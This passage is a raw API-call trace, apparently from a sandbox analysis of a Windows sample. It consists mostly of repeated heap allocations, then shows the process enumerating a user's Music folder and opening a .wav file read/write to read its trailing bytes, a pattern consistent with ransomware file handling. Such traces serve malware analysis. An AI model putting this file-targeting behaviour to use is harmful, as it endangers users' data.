0x2aeaea0 [0197.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.982] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.982] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.984] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.984] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.986] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.989] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.003] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\") returned="znTr-YRiXJ\\" [0198.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.004] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\") returned="j ucK2lALp_iPp\\" [0198.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea9b0 [0198.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.004] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0198.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea9b0 | out: hHeap=0x2c0000) returned 1 [0198.004] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0198.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0198.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.005] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0198.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.005] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0198.005] PathFindFileNameW (pszPath="") returned="" [0198.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.005] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\*" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x642fc170, ftCreationTime.dwHighDateTime=0x1d89fe8, ftLastAccessTime.dwLowDateTime=0x9c414fd0, ftLastAccessTime.dwHighDateTime=0x1d8a1b8, ftLastWriteTime.dwLowDateTime=0x9c414fd0, ftLastWriteTime.dwHighDateTime=0x1d8a1b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0198.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.009] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x642fc170, ftCreationTime.dwHighDateTime=0x1d89fe8, ftLastAccessTime.dwLowDateTime=0x9c414fd0, ftLastAccessTime.dwHighDateTime=0x1d8a1b8, ftLastWriteTime.dwLowDateTime=0x9c414fd0, ftLastWriteTime.dwHighDateTime=0x1d8a1b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.010] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed2b79f0, ftCreationTime.dwHighDateTime=0x1d89bf2, ftLastAccessTime.dwLowDateTime=0x48b30f50, ftLastAccessTime.dwHighDateTime=0x1d8a2be, ftLastWriteTime.dwLowDateTime=0x48b30f50, ftLastWriteTime.dwHighDateTime=0x1d8a2be, nFileSizeHigh=0x0, nFileSizeLow=0x25d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0VhP5.wav", cAlternateFileName="")) returned 1 [0198.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0198.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.010] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\0VhP5.wav") returned=".wav" [0198.010] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\0VhP5.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\0vhp5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.010] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=9689) returned 1 [0198.011] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.015] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x25b3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.015] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 